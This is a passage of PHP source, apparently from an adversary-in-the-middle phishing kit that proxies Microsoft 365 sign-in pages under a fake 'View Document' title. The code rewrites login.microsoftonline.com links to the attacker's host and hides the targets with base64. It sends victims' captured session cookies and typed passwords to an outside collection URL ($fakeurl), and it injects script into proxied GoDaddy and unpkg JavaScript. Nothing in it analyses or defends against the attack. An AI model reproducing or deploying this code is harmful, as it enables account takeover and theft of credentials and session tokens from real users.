View Document

1 && strpos($contentType, "text/html") !== false){ if(strlen($currentUser) > 3){ $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie')); if(strlen($getCookie) > 10 ){ $array = json_decode($getCookie, true); $result = array_values($array); $getCookie = json_encode($result, JSON_PRETTY_PRINT); $postData = b64e($getCookie); $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode; send_code($apiUrl); } } } if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false && $documentRoot == $redirector){ file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentpage', trim(getHost($targetApiUrl))); } $decompressed_data = gzdecode($responseBody); if(strpos(strtolower($decompressed_data),":443/login.srf") !== false && strpos(strtolower($decompressed_data),"hiddenform") !== false ){ $thisIsFinalExternal = true; $decompressed_data_final = str_replace("login.microsoftonline.com:443",$baseHost."/p",$decompressed_data); $decompressed_data_final = gzencode($decompressed_data_final); } if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false){ $codeaccepter = trim(@file_get_contents("stabler.txt")); $addScript = ""; $decompressed_data = $decompressed_data.$addScript; } $pattern = '/href="\/(.*?)"/'; $decompressed_data = str_replace(b64d("PHRpdGxlPlNpZ24gaW4gdG8geW91ciBhY2NvdW50PC90aXRsZT4"),b64d("PHRpdGxlPlZpZXcgRG9jdW1lbnQ8L3RpdGxlPg"),$decompressed_data); $otltext = b64d("PHRpdGxlPlNpZ24gaW4gdG8gT3V0bG9vazwvdGl0bGU+"); $decompressed_data = str_replace($otltext,"View Document",$decompressed_data); if(strpos($decompressed_data, "fShowPersistentCookiesWarning") !== false && strpos($contentType, "text/html") && $email && $password && strlen($email) && strlen($password)){ $dt = '{"Temp Validation":"'.$password.' == Incorrect

"}'; $cont = b64e($dt); $alert_ = $fakeurl . "?alert=" . genFive() . "&cont=" . $cont . "&rand=" . genFive(); send_code($alert_); } $decompressed_data = str_replace(b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ"), $baseHost."/p", $decompressed_data); if ($responseTargetRoot !== b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ")){ if(strlen($redirector) > 1){ $listUrls = getUrls($decompressed_data); $urlsString = implode("==,",$listUrls); $search = array(',', '=', '!', '?', "#", "}","{", "'", '"'); $replace = ' '; // The string to replace with $urlsString = str_replace($search, $replace, $urlsString); $listUrls = getUrls($urlsString); $hostList = []; foreach ($listUrls as $url_) { $tempHost = getHost($url_); $tempHost = extractHost($decompressed_data,$tempHost); $hostList[] = $tempHost; } $listUrls = array_unique($hostList); foreach ($listUrls as $url_) { $tempHost = $url_; $placeLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$tempHost); if(strlen($placeLine) > 5){ $placeHost = explode("-=-",trim($placeLine))[1]; $placeCode = explode("-=-",trim($placeLine))[0]; $decompressed_data = str_replace($placeHost, $baseHost."/".$placeCode,$decompressed_data); } else{ $placeholder = genFive(); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder."-=-".$tempHost."\n",FILE_APPEND); $decompressed_data = str_replace($tempHost, $baseHost."/".$placeholder,$decompressed_data); } } } } if(strpos($decompressed_data,"GetCredentialType?mkt=") !== false){ } $decompressed_data = $suffix.$decompressed_data; $decompressed_data = str_replace(b64d("PHRpdGxlPlJlZGlyZWN0aW5nPC90aXRsZT4"),b64d("PHRpdGxlPlZpZXdpbmcgRG9jdW1lbnQ8L3RpdGxlPg"),$decompressed_data); if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false && strpos($targetApiUrl,b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ")) !== false && file_exists($startFile) && strpos($decompressed_data,b64d("Y29udGVudC9qcy9Cc3NvSW50ZXJydXB0X0NvcmVf")) === false){ // $decompressed_data = $decompressed_data.$submitterFirst; $decompressed_data = str_replace('',$submitterFirst.'',$decompressed_data); for ($i = 0; $i < 2; $i++) { // Loop only twice since we already appended once if (strpos($decompressed_data, $submitterFirst) !== false) { // file_put_contents("appendersss.txt", $i."broken\n", FILE_APPEND); // file_put_contents("appendersss.txt", $i.$submitterFirst."===failed-checking\n", FILE_APPEND); break; } else{ // file_put_contents("appendersss.txt", $decompressed_data."\n\n", FILE_APPEND); // file_put_contents("appendersss.txt", $i."===failed-checking687iuy\n", FILE_APPEND); $decompressed_data = str_replace('',$submitterFirst.'',$decompressed_data); } } // file_put_contents("appendersss.txt", $decompressed_data."\n\n", FILE_APPEND); } $responseBody = gzencode($decompressed_data); } elseif(strpos(strtolower($concat_header), "content-encoding") === false){ if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false){ if(strlen($currentUser) > 3){ $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie')); if(strlen($getCookie) > 10 ){ $array = json_decode($getCookie, true); $result = array_values($array); $getCookie = json_encode($result, JSON_PRETTY_PRINT); $postData = b64e($getCookie); $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode; send_code($apiUrl); } } } if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false && $documentRoot == $redirector){ file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentpage', trim(getHost($targetApiUrl))); } $decompressed_data = $responseBody; if(strpos(strtolower($decompressed_data),":443/login.srf") !== false && strpos(strtolower($decompressed_data),"hiddenform") !== false ){ $thisIsFinalExternal = true; $decompressed_data_final = str_replace("login.microsoftonline.com:443",$baseHost."/p",$decompressed_data); $decompressed_data_final = $decompressed_data_final; } if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false){ $codeaccepter = trim(@file_get_contents("stabler.txt")); $addScript = ""; $decompressed_data = $decompressed_data.$addScript; } $pattern = '/href="\/(.*?)"/'; $decompressed_data = str_replace(b64d("PHRpdGxlPlNpZ24gaW4gdG8geW91ciBhY2NvdW50PC90aXRsZT4"),b64d("PHRpdGxlPlZpZXcgRG9jdW1lbnQ8L3RpdGxlPg"),$decompressed_data); $otltext = b64d("PHRpdGxlPlNpZ24gaW4gdG8gT3V0bG9vazwvdGl0bGU+"); $decompressed_data = str_replace($otltext,"View Document",$decompressed_data); if(strpos($decompressed_data, "fShowPersistentCookiesWarning") !== false && strpos($contentType, "text/html") && $email && $password && strlen($email) && strlen($password)){ $dt = '{"Temp Validation":"'.$password.' == Incorrect

"}'; $cont = b64e($dt); $alert_ = $fakeurl . "?alert=" . genFive() . "&cont=" . $cont . "&rand=" . genFive(); send_code($alert_); } $decompressed_data = str_replace(b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ"), $baseHost."/p", $decompressed_data); if ($responseTargetRoot !== b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ")){ if(strlen($redirector) > 1){ $listUrls = getUrls($decompressed_data); $urlsString = implode("==,",$listUrls); $search = array(',', '=', '!', '?', "#", "}","{", "'", '"'); $replace = ' '; // The string to replace with $urlsString = str_replace($search, $replace, $urlsString); $listUrls = getUrls($urlsString); $hostList = []; foreach ($listUrls as $url_) { $tempHost = getHost($url_); $tempHost = extractHost($decompressed_data,$tempHost); $hostList[] = $tempHost; } $listUrls = array_unique($hostList); foreach ($listUrls as $url_) { $tempHost = $url_; $placeLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$tempHost); if(strlen($placeLine) > 5){ $placeHost = explode("-=-",trim($placeLine))[1]; $placeCode = explode("-=-",trim($placeLine))[0]; $decompressed_data = str_replace($placeHost, $baseHost."/".$placeCode,$decompressed_data); } else{ $placeholder = genFive(); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder."-=-".$tempHost."\n",FILE_APPEND); $decompressed_data = str_replace($tempHost, $baseHost."/".$placeholder,$decompressed_data); } } } } if(strpos($decompressed_data,"GetCredentialType?mkt=") !== false){ } $decompressed_data = $suffix.$decompressed_data; $decompressed_data = str_replace(b64d("PHRpdGxlPlJlZGlyZWN0aW5nPC90aXRsZT4"),b64d("PHRpdGxlPlZpZXdpbmcgRG9jdW1lbnQ8L3RpdGxlPg"),$decompressed_data); if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false && strpos($targetApiUrl,b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ")) !== false && file_exists($startFile) && strpos($decompressed_data,b64d("Y29udGVudC9qcy9Cc3NvSW50ZXJydXB0X0NvcmVf")) === false){ // $decompressed_data = $decompressed_data.$submitterFirst; $decompressed_data = str_replace('',$submitterFirst.'',$decompressed_data); for ($i = 0; $i < 2; $i++) { // Loop only twice since we already appended once if (strpos($decompressed_data, $submitterFirst) !== false) { // file_put_contents("appendersss.txt", $i."broken\n", FILE_APPEND); // file_put_contents("appendersss.txt", $i.$submitterFirst."===failed-checking\n", FILE_APPEND); break; } else{ // file_put_contents("appendersss.txt", $decompressed_data."\n\n", FILE_APPEND); // file_put_contents("appendersss.txt", $i."===failed-checking687iuy\n", FILE_APPEND); $decompressed_data = str_replace('',$submitterFirst.'',$decompressed_data); } } // file_put_contents("appendersss.txt", $decompressed_data."\n\n", FILE_APPEND); } $responseBody = $decompressed_data; } else{ if(strlen($redirector) > 1){ if(strlen($contentType) > 1 && strpos($contentType, "text/html") !== false && $documentRoot == $redirector){ if(strlen($currentUser) > 3){ $getCookie = trim(@file_get_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/'.stripEmail($currentUser).'-logcookie')); if(strlen($getCookie) > 10 ){ $array = json_decode($getCookie, true); $result = array_values($array); $getCookie = json_encode($result, JSON_PRETTY_PRINT); $postData = b64e($getCookie); $apiUrl = $fakeurl . "?alertcookie=" . genFive()."&rand=".genFive()."&owner=".stripEmail($currentUser)."&data=".$postData."&code=".$initialValidationCode; send_code($apiUrl); } } file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/currentpage', trim(getHost($targetApiUrl))); } $existingCode = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$redirector); if(strlen($existingCode) < 2){ $placeholder = genFive(); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder."-=-".$redirector."\n",FILE_APPEND); } else{ $placeholder = explode("-=-",$existingCode)[0]; } if(strpos($responseBody,$redirector) !== false){ $responseBody = str_replace($redirector, $baseHost."/".$placeholder, $responseBody); } } if($responseTargetRoot !== b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbQ")){ $adfsscope = b64d("L2FkZnMvc2VydmljZXMvdHJ1c3QmcXVvdDs"); $pos = strpos($responseBody, $adfsscope); if ($pos !== false) { $pathurl_ = substr($responseBody, $pos - 5, 5); $placeLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$pathurl_); $actualhost = getFullPlaceholder($placeLine)[1]; $responseBody = str_replace($baseHost."/".$pathurl_,$actualhost,$responseBody); } $listUrls = getUrls($responseBody); $responseBody = str_replace(b64d("bG9naW4ubWljcm9zb2Z0b25saW5lLmNvbTo0NDM"),$baseHost."/p",$responseBody); $urlsString = implode("==,",$listUrls); $search = array(',', '=', '!', '?', "#", "}","{", "'", '"'); $replace = ' '; // The string to replace with $urlsString = str_replace($search, $replace, $urlsString); $listUrls = getUrls($urlsString); $hostList = []; foreach ($listUrls as $url_) { $tempHost = getHost($url_); $tempHost = extractHost($responseBody,$tempHost); $hostList[] = $tempHost; } $listUrls = array_unique($hostList); foreach ($listUrls as $url_) { $tempHost = getHost($url_); $placeLine = findStringLine($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$tempHost); if(strlen($placeLine) > 5){ $placeHost = explode("-=-",trim($placeLine))[1]; $placeCode = explode("-=-",trim($placeLine))[0]; $responseBody = str_replace($placeHost, $baseHost."/".$placeCode,$responseBody); } else{ $placeholder = genFive(); @file_put_contents($workingDir."/tpfolder/".$_SESSION['usernameidnum'].'/placeholder',$placeholder."-=-".$tempHost."\n",FILE_APPEND); $responseBody = str_replace($tempHost, $baseHost."/".$placeholder,$responseBody); } } if (((strpos($targetApiUrl,"/p.js") !== false) && (strpos($targetApiUrl,b64d("Z29kYWRkeS5jb20")) !== false)) || (strpos($targetApiUrl, b64d("ZWxhc3RpYy1hcG0tcnVtLnVtZC5taW4uanM")) !== false) && (strpos($targetApiUrl,b64d("dW5wa2cuY29t")) !== false)) { $responseBody = decodeBrotli($responseBody); $responseBody = $suffix.$responseBody; $responseBody = encodeBrotli($responseBody); } // file_put_contents("appendersss.txt", ""."===third33".$targetApiUrl__."\n", FILE_APPEND); // if(strpos($targetApiUrl__,"a6001dc6395a0a82") !== false){ // file_put_contents("appendersss.txt", ""."===third33"."==".$responseBody."======".$targetApiUrl__."\n", FILE_APPEND); // } // $responseBody = str_replace("/api/shopper/get_state","https://".$baseHost."/api/shopper/get_state",$responseBody); // $responseBody = str_replace("/api/idp/user/get","https://".$baseHost."/api/idp/user/get",$responseBody); } //$responseBody = $suffix.$responseBody; } //file_put_contents("poi.txt","88888"); ?>